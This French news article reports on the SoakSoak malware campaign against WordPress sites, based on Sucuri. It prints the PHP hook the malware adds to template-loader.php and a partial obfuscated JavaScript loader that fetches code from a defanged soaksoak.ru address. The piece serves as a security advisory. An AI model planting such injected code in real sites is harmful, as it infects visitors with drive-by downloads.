Les utilisateurs de WordPress, un outil gratuit de création de blogs et de gestions de contenus (CMS) viennent d'être informés d'une grande campagne d'attaque par des virus largement répandus.
Selon le site Sucuri.net qui rapporte l'information, déjà plus de 100.000 sites web WordPress dans le monde entier seraient infectés. Et ce n'est pas fini !
L'information a été connue par la Communauté WordPress très tôt ce dimanche matin lorsque Google a blacklisté (liste noire) plus de 11.000 noms de domaines en raison de cette propagation du virus SoakSoak (du nom du site SoakSoak.ru) ciblant les sites WordPress.
Avec à ce jour plus de 70 millions de sites web propulsés avec WordPress, le virus SoakSoak pourrait s'avérer très dévasteur dans les heures à venir si un antivirus n'était pas trouvé rapidement.
Comment se manifeste le virus SoakSoak ?
Une fois infecté, un site visité aura tendance à rediriger de façon inattendue le visiteur vers des pages web de SoakSoak.ru (en Russie).
Si votre navigateur web ou votre anti-virus ne bloque pas cette redirection inattendue, l'utilisateur aura droit à un téléchargement involontaire, et donc automatique, de fichiers malveillants sur son ordinateur. Sans aucune intervention de sa part.
Mais, selon Sucuri.net, cette menace de SoakSoak ne concernerait pas que les sites web sous WordPress. Ces techniciens de la sécurité internet continuent leurs investigations pour déterminer les contours exacts de ce virus.
Pour l'instant, ils laissent entendre que, sur WordPress, le virus SoakSoak modifie le fichier "wp-includes/template-loader.php" en y incluant le code ci-dessous :
function FuncQueueObject()
{
wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');
Et ce, afin de provoquer l'exécution du fichier "wp-includes/js/swobject.js" pour qu'il se charge sur chaque page visitée du site en injectant le malware suivant :
eval(decodeURIComponent ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));
Ce virus, lorsqu'il est décodé télécharge un autre virus depuis le site SoakSoak.ru, plus précisément le fichier hxxp://soaksoak.ru/xteas/code
Si vous souhaitez vérifier si vous êtes infecté par le virus SoakSoak, vous pouvez utiliser cet outil en ligne fourni par Sucuri.net pour scanner gratuitement votre site : http://sitecheck.sucuri.net/
